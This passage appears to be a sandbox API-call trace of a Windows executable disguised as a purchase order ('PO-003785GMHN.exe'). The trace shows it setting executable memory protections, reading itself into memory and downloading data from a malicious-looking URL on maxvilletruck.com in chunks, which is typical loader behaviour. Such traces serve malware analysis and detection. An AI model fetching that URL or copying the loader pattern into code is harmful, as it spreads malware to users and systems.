lpProcName="InternetOpenUrlA") returned 0x701ea6c0 [0083.470] GetProcAddress (hModule=0x701a0000, lpProcName="InternetOpenA") returned 0x702685d0 [0083.470] GetProcAddress (hModule=0x701a0000, lpProcName="InternetCloseHandle") returned 0x7026d200 [0083.471] GetProcAddress (hModule=0x701a0000, lpProcName="HttpQueryInfoA") returned 0x70241880 [0083.471] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x743f0000 [0083.471] GetProcAddress (hModule=0x743f0000, lpProcName="SafeArrayPtrOfIndex") returned 0x74403090 [0083.471] GetProcAddress (hModule=0x743f0000, lpProcName="SafeArrayGetUBound") returned 0x744025b0 [0083.471] GetProcAddress (hModule=0x743f0000, lpProcName="SafeArrayGetLBound") returned 0x74402a10 [0083.471] GetProcAddress (hModule=0x743f0000, lpProcName="SafeArrayCreate") returned 0x74417dd0 [0083.471] GetProcAddress (hModule=0x743f0000, lpProcName="VariantChangeType") returned 0x74407230 [0083.472] GetProcAddress (hModule=0x743f0000, lpProcName="VariantCopy") returned 0x744092d0 [0083.472] GetProcAddress (hModule=0x743f0000, lpProcName="VariantClear") returned 0x74409570 [0083.472] GetProcAddress (hModule=0x743f0000, lpProcName="VariantInit") returned 0x74402590 [0083.472] VirtualProtect (in: lpAddress=0x20b1000, dwSize=0x13010, flNewProtect=0x20, lpflOldProtect=0x47e60c | out: lpflOldProtect=0x47e60c*=0x4) returned 1 [0083.474] VirtualProtect (in: lpAddress=0x20c5000, dwSize=0x5b8, flNewProtect=0x80, lpflOldProtect=0x47e60c | out: lpflOldProtect=0x47e60c*=0x1) returned 0 [0083.475] VirtualProtect (in: lpAddress=0x20c6000, dwSize=0xc41, flNewProtect=0x80, lpflOldProtect=0x47e60c | out: lpflOldProtect=0x47e60c*=0x1) returned 0 [0083.476] VirtualProtect (in: lpAddress=0x20c7000, dwSize=0xbb2, flNewProtect=0x80, lpflOldProtect=0x47e60c | out: lpflOldProtect=0x47e60c*=0x1) returned 0 [0083.477] VirtualProtect (in: lpAddress=0x20c8000, dwSize=0x1814, flNewProtect=0x80, lpflOldProtect=0x47e60c | out: lpflOldProtect=0x47e60c*=0x1) returned 0 [0083.478] VirtualProtect (in: lpAddress=0x20ca000, dwSize=0x10, flNewProtect=0x80, lpflOldProtect=0x47e60c | out: lpflOldProtect=0x47e60c*=0x1) returned 0 [0083.490] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x83d010 [0083.493] GetKeyboardType (nTypeFlag=0) returned 4 [0083.496] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\PO-003785GMHN.exe\" " [0083.496] GetStartupInfoA (in: lpStartupInfo=0x19fe18 | out: lpStartupInfo=0x19fe18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PO-003785GMHN.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0083.496] GetVersion () returned 0x23f00206 [0083.496] GetVersion () returned 0x23f00206 [0083.496] GetCurrentThreadId () returned 0x12c4 [0083.507] GetModuleFileNameA (in: hModule=0x20b0000, lpFilename=0x19ed04, nSize=0x105 | out: lpFilename="\x01" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\\x01")) returned 0x0 [0083.508] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x19ebdb, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PO-003785GMHN.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\po-003785gmhn.exe")) returned 0x2f [0083.508] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19ecf4 | out: phkResult=0x19ecf4*=0x0) returned 0x2 [0083.508] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19ecf4 | out: phkResult=0x19ecf4*=0x0) returned 0x2 [0083.508] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19ecf4 | out: phkResult=0x19ecf4*=0x0) returned 0x2 [0083.508] lstrcpynA (in: lpString1=0x19ebdb, lpString2="\x01", iMaxLength=261 | out: lpString1="\x01") returned="\x01" [0083.508] GetThreadLocale () returned 0x409 [0083.508] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x19ecef, cchData=5 | out: lpLCData="ENU") returned 4 [0083.508] lstrlenA (lpString="\x01") returned 1 [0083.508] LoadStringA (in: hInstance=0x20b0000, uID=0xffdf, lpBuffer=0x19ee38, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.518] LoadStringA (in: hInstance=0x20b0000, uID=0xffde, lpBuffer=0x19ee38, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.519] LoadStringA (in: hInstance=0x20b0000, uID=0xffdc, lpBuffer=0x19ee38, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.519] LoadStringA (in: hInstance=0x20b0000, uID=0xffdd, lpBuffer=0x19ee38, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.520] LoadStringA (in: hInstance=0x20b0000, uID=0xffd0, lpBuffer=0x19ee38, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.520] LoadStringA (in: hInstance=0x20b0000, uID=0xffd8, lpBuffer=0x19ee38, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.521] LoadStringA (in: hInstance=0x20b0000, uID=0xffef, lpBuffer=0x19ee38, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.521] LoadStringA (in: hInstance=0x20b0000, uID=0xffec, lpBuffer=0x19ee38, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.522] LoadStringA (in: hInstance=0x20b0000, uID=0xffd3, lpBuffer=0x19ee38, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.522] LoadStringA (in: hInstance=0x20b0000, uID=0xffd2, lpBuffer=0x19ee38, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.523] LoadStringA (in: hInstance=0x20b0000, uID=0xffe5, lpBuffer=0x19ee38, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.523] LoadStringA (in: hInstance=0x20b0000, uID=0xffe6, lpBuffer=0x19ee38, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.524] LoadStringA (in: hInstance=0x20b0000, uID=0xffe7, lpBuffer=0x19ee38, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.524] LoadStringA (in: hInstance=0x20b0000, uID=0xffe4, lpBuffer=0x19ee38, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.525] LoadStringA (in: hInstance=0x20b0000, uID=0xffe2, lpBuffer=0x19ee38, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.526] LoadStringA (in: hInstance=0x20b0000, uID=0xffe0, lpBuffer=0x19ee38, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.526] LoadStringA (in: hInstance=0x20b0000, uID=0xffff, lpBuffer=0x19ee38, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.526] LoadStringA (in: hInstance=0x20b0000, uID=0xfffe, lpBuffer=0x19ee38, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.527] LoadStringA (in: hInstance=0x20b0000, uID=0xfffd, lpBuffer=0x19ee38, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.527] LoadStringA (in: hInstance=0x20b0000, uID=0xfffc, lpBuffer=0x19ee38, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.528] LoadStringA (in: hInstance=0x20b0000, uID=0xfffb, lpBuffer=0x19ee38, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.528] LoadStringA (in: hInstance=0x20b0000, uID=0xfffa, lpBuffer=0x19ee38, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.529] LoadStringA (in: hInstance=0x20b0000, uID=0xfff9, lpBuffer=0x19ee38, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.529] LoadStringA (in: hInstance=0x20b0000, uID=0xfff8, lpBuffer=0x19ee38, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.530] LoadStringA (in: hInstance=0x20b0000, uID=0xfff7, lpBuffer=0x19ee38, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.530] LoadStringA (in: hInstance=0x20b0000, uID=0xfff6, lpBuffer=0x19ee38, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.531] LoadStringA (in: hInstance=0x20b0000, uID=0xfff5, lpBuffer=0x19ee38, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.531] LoadStringA (in: hInstance=0x20b0000, uID=0xfff4, lpBuffer=0x19ee38, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.532] LoadStringA (in: hInstance=0x20b0000, uID=0xfff3, lpBuffer=0x19ee38, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.533] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x851820 [0083.534] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x27d0000 [0083.534] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x852820 [0083.534] VirtualAlloc (lpAddress=0x27d0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x27d0000 [0083.535] LoadStringA (in: hInstance=0x20b0000, uID=0xfff1, lpBuffer=0x19ee24, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.535] LoadStringA (in: hInstance=0x20b0000, uID=0xffe1, lpBuffer=0x19ee24, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0083.536] GetVersionExA (in: lpVersionInformation=0x19fdbc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x27d0004, dwMinorVersion=0x27d0000, dwBuildNumber=0x0, dwPlatformId=0x19fe04, szCSDVersion="0f\x0c\x02\x11") | out: lpVersionInformation=0x19fdbc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0083.537] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74530000 [0083.537] GetProcAddress (hModule=0x74530000, lpProcName="GetDiskFreeSpaceExA") returned 0x745569d0 [0083.537] GetThreadLocale () returned 0x409 [0083.537] GetThreadLocale () returned 0x409 [0083.537] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x19fc94, cchData=256 | out: lpLCData="Jan") returned 4 [0083.537] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x19fc94, cchData=256 | out: lpLCData="January") returned 8 [0083.537] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x19fc94, cchData=256 | out: lpLCData="Feb") returned 4 [0083.537] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x19fc94, cchData=256 | out: lpLCData="February") returned 9 [0083.537] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x19fc94, cchData=256 | out: lpLCData="Mar") returned 4 [0083.537] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x19fc94, cchData=256 | out: lpLCData="March") returned 6 [0083.537] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x19fc94, cchData=256 | out: lpLCData="Apr") returned 4 [0083.537] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x19fc94, cchData=256 | out: lpLCData="April") returned 6 [0083.537] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x19fc94, cchData=256 | out: lpLCData="May") returned 4 [0083.537] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x19fc94, cchData=256 | out: lpLCData="May") returned 4 [0083.537] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x19fc94, cchData=256 | out: lpLCData="Jun") returned 4 [0083.537] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x19fc94, cchData=256 | out: lpLCData="June") returned 5 [0083.537] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x19fc94, cchData=256 | out: lpLCData="Jul") returned 4 [0083.538] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x19fc94, cchData=256 | out: lpLCData="July") returned 5 [0083.538] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x19fc94, cchData=256 | out: lpLCData="Aug") returned 4 [0083.538] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x19fc94, cchData=256 | out: lpLCData="August") returned 7 [0083.538] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x19fc94, cchData=256 | out: lpLCData="Sep") returned 4 [0083.538] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x19fc94, cchData=256 | out: lpLCData="September") returned 10 [0083.538] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x19fc94, cchData=256 | out: lpLCData="Oct") returned 4 [0083.538] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x19fc94, cchData=256 | out: lpLCData="October") returned 8 [0083.538] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x19fc94, cchData=256 | out: lpLCData="Nov") returned 4 [0083.538] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x19fc94, cchData=256 | out: lpLCData="November") returned 9 [0083.538] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x19fc94, cchData=256 | out: lpLCData="Dec") returned 4 [0083.538] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x19fc94, cchData=256 | out: lpLCData="December") returned 9 [0083.538] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x19fc94, cchData=256 | out: lpLCData="Sun") returned 4 [0083.538] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x19fc94, cchData=256 | out: lpLCData="Sunday") returned 7 [0083.538] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x19fc94, cchData=256 | out: lpLCData="Mon") returned 4 [0083.538] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x19fc94, cchData=256 | out: lpLCData="Monday") returned 7 [0083.538] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x19fc94, cchData=256 | out: lpLCData="Tue") returned 4 [0083.538] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x19fc94, cchData=256 | out: lpLCData="Tuesday") returned 8 [0083.538] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x19fc94, cchData=256 | out: lpLCData="Wed") returned 4 [0083.538] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x19fc94, cchData=256 | out: lpLCData="Wednesday") returned 10 [0083.538] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x19fc94, cchData=256 | out: lpLCData="Thu") returned 4 [0083.538] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x19fc94, cchData=256 | out: lpLCData="Thursday") returned 9 [0083.539] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x19fc94, cchData=256 | out: lpLCData="Fri") returned 4 [0083.539] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x19fc94, cchData=256 | out: lpLCData="Friday") returned 7 [0083.539] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x19fc94, cchData=256 | out: lpLCData="Sat") returned 4 [0083.539] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x19fc94, cchData=256 | out: lpLCData="Saturday") returned 9 [0083.539] GetThreadLocale () returned 0x409 [0083.539] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x19fcf0, cchData=256 | out: lpLCData="$") returned 2 [0083.539] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x19fcf0, cchData=256 | out: lpLCData="0") returned 2 [0083.541] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x19fcf0, cchData=256 | out: lpLCData="0") returned 2 [0083.541] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x19fde8, cchData=2 | out: lpLCData=",") returned 2 [0083.541] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x19fde8, cchData=2 | out: lpLCData=".") returned 2 [0083.541] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x19fcf0, cchData=256 | out: lpLCData="2") returned 2 [0083.541] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x19fde8, cchData=2 | out: lpLCData="/") returned 2 [0083.541] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x19fcf0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0083.541] GetThreadLocale () returned 0x409 [0083.541] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x19fcbc, cchData=256 | out: lpLCData="1") returned 2 [0083.541] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x19fcf0, cchData=256 | out: lpLCData="dddd, MMMM d, yyyy") returned 19 [0083.541] GetThreadLocale () returned 0x409 [0083.541] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x19fcbc, cchData=256 | out: lpLCData="1") returned 2 [0083.541] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x19fde8, cchData=2 | out: lpLCData=":") returned 2 [0083.541] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x19fcf0, cchData=256 | out: lpLCData="AM") returned 3 [0083.541] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x19fcf0, cchData=256 | out: lpLCData="PM") returned 3 [0083.542] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x19fcf0, cchData=256 | out: lpLCData="0") returned 2 [0083.542] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x19fcf0, cchData=256 | out: lpLCData="0") returned 2 [0083.542] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x19fcf0, cchData=256 | out: lpLCData="0") returned 2 [0083.542] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x19fde8, cchData=2 | out: lpLCData=",") returned 2 [0083.556] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x743f0000 [0083.556] GetProcAddress (hModule=0x743f0000, lpProcName="VariantChangeTypeEx") returned 0x74407260 [0083.557] GetProcAddress (hModule=0x743f0000, lpProcName="VarNeg") returned 0x74452470 [0083.557] GetProcAddress (hModule=0x743f0000, lpProcName="VarNot") returned 0x744536e0 [0083.557] GetProcAddress (hModule=0x743f0000, lpProcName="VarAdd") returned 0x7442cbb0 [0083.557] GetProcAddress (hModule=0x743f0000, lpProcName="VarSub") returned 0x7442e0d0 [0083.557] GetProcAddress (hModule=0x743f0000, lpProcName="VarMul") returned 0x7442d800 [0083.557] GetProcAddress (hModule=0x743f0000, lpProcName="VarDiv") returned 0x74452980 [0083.557] GetProcAddress (hModule=0x743f0000, lpProcName="VarIdiv") returned 0x74453320 [0083.558] GetProcAddress (hModule=0x743f0000, lpProcName="VarMod") returned 0x74453580 [0083.558] GetProcAddress (hModule=0x743f0000, lpProcName="VarAnd") returned 0x74423690 [0083.558] GetProcAddress (hModule=0x743f0000, lpProcName="VarOr") returned 0x74453790 [0083.558] GetProcAddress (hModule=0x743f0000, lpProcName="VarXor") returned 0x74453930 [0083.558] GetProcAddress (hModule=0x743f0000, lpProcName="VarCmp") returned 0x74402ae0 [0083.558] GetProcAddress (hModule=0x743f0000, lpProcName="VarI4FromStr") returned 0x74405140 [0083.559] GetProcAddress (hModule=0x743f0000, lpProcName="VarR4FromStr") returned 0x74423020 [0083.559] GetProcAddress (hModule=0x743f0000, lpProcName="VarR8FromStr") returned 0x74423cd0 [0083.559] GetProcAddress (hModule=0x743f0000, lpProcName="VarDateFromStr") returned 0x74418b20 [0083.559] GetProcAddress (hModule=0x743f0000, lpProcName="VarCyFromStr") returned 0x74402280 [0083.559] GetProcAddress (hModule=0x743f0000, lpProcName="VarBoolFromStr") returned 0x744044d0 [0083.560] GetProcAddress (hModule=0x743f0000, lpProcName="VarBstrFromCy") returned 0x744231c0 [0083.560] GetProcAddress (hModule=0x743f0000, lpProcName="VarBstrFromDate") returned 0x744199f0 [0083.560] GetProcAddress (hModule=0x743f0000, lpProcName="VarBstrFromBool") returned 0x74404480 [0083.562] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x2dc [0083.562] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x2e0 [0083.562] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2e4 [0083.564] timeSetEvent (uDelay=0x2328, uResolution=0x0, fptc=0x20c3e5c, dwUser=0x0, fuEvent=0x1) returned 0x10 [0083.567] GetMessageA (in: lpMsg=0x20c69dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x20c69dc) returned 1 [0083.567] TranslateMessage (lpMsg=0x20c69dc) returned 0 [0083.567] DispatchMessageA (lpMsg=0x20c69dc) returned 0x0 [0083.568] NtdllDefWindowProc_A (hWnd=0x3033a, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0 [0083.568] GetMessageA (lpMsg=0x20c69dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) Thread: id = 2 os_tid = 0xc58 Thread: id = 3 os_tid = 0xd74 Thread: id = 4 os_tid = 0x674 [0092.567] QueryPerformanceCounter (in: lpPerformanceCount=0x29cfe70 | out: lpPerformanceCount=0x29cfe70*=3151042422168) returned 1 [0092.567] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x29cfd68, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PO-003785GMHN.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\po-003785gmhn.exe")) returned 0x2f [0092.568] CreateFileA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PO-003785GMHN.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\po-003785gmhn.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a4 [0092.568] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x83d448 [0092.568] GetFileSize (in: hFile=0x2a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf6600 [0092.569] VirtualAlloc (lpAddress=0x27d4000, dwSize=0xf8000, flAllocationType=0x1000, flProtect=0x4) returned 0x27d4000 [0092.571] ReadFile (in: hFile=0x2a4, lpBuffer=0x27d0608, nNumberOfBytesToRead=0xf6600, lpNumberOfBytesRead=0x29cfe50, lpOverlapped=0x0 | out: lpBuffer=0x27d0608*, lpNumberOfBytesRead=0x29cfe50*=0xf6600, lpOverlapped=0x0) returned 1 [0092.588] CloseHandle (hObject=0x2a4) returned 1 [0092.588] VirtualAlloc (lpAddress=0x0, dwSize=0x3e0000, flAllocationType=0x2000, flProtect=0x1) returned 0x2ad0000 [0092.589] VirtualAlloc (lpAddress=0x2ad0000, dwSize=0x3dc000, flAllocationType=0x1000, flProtect=0x4) returned 0x2ad0000 [0092.597] VirtualFree (lpAddress=0x28c8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0092.676] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2eb0000 [0092.676] VirtualAlloc (lpAddress=0x2eb0000, dwSize=0x8c000, flAllocationType=0x1000, flProtect=0x4) returned 0x2eb0000 [0092.680] VirtualAlloc (lpAddress=0x2eac000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2eac000 [0092.687] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2fb0000 [0092.687] VirtualAlloc (lpAddress=0x2fb0000, dwSize=0x84000, flAllocationType=0x1000, flProtect=0x4) returned 0x2fb0000 [0092.689] VirtualAlloc (lpAddress=0x2f3c000, dwSize=0x74000, flAllocationType=0x1000, flProtect=0x4) returned 0x2f3c000 [0092.691] VirtualFree (lpAddress=0x2f38000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0092.702] VirtualFree (lpAddress=0x2fb0000, dwSize=0x84000, dwFreeType=0x4000) returned 1 [0092.704] VirtualFree (lpAddress=0x2fa8000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0092.705] VirtualFree (lpAddress=0x2fb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.706] InternetOpenA (lpszAgent="lVali", dwAccessType=0x4, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0092.708] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="https://maxvilletruck.com/errorserverlogrelaapirootterminationloggercongurat/Udffvxubuutfiqkrvfkzhnjdxnhxzvn", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x200, dwContext=0x0) returned 0xcc000c [0098.119] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x20c6a14, lpdwBufferLength=0x20c6c1c, lpdwIndex=0x20c6c18*=0x0 | out: lpBuffer=0x20c6a14*, lpdwBufferLength=0x20c6c1c*=0x3, lpdwIndex=0x20c6c18*=0x0) returned 1 [0098.119] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0098.122] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0098.122] InternetOpenA (lpszAgent="aswe", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0098.123] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="https://maxvilletruck.com/errorserverlogrelaapirootterminationloggercongurat/Udffvxubuutfiqkrvfkzhnjdxnhxzvn", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x80000000, dwContext=0x0) returned 0xcc000c [0098.589] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.590] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.590] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.590] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.590] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.590] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.590] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.591] VirtualAlloc (lpAddress=0x2fa8000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2fa8000 [0098.591] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.704] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.704] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, 